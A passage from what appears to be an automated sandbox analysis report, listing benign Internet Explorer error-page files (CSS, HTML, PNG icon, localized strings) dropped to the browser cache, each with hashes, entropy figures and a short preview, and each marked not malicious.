                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[3]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[4]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[5]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[6]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dnserror[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dnserror[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dnserror[3]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[3]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[4]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[5]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\NewErrorPageTemplate[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\NewErrorPageTemplate[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dnserror[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
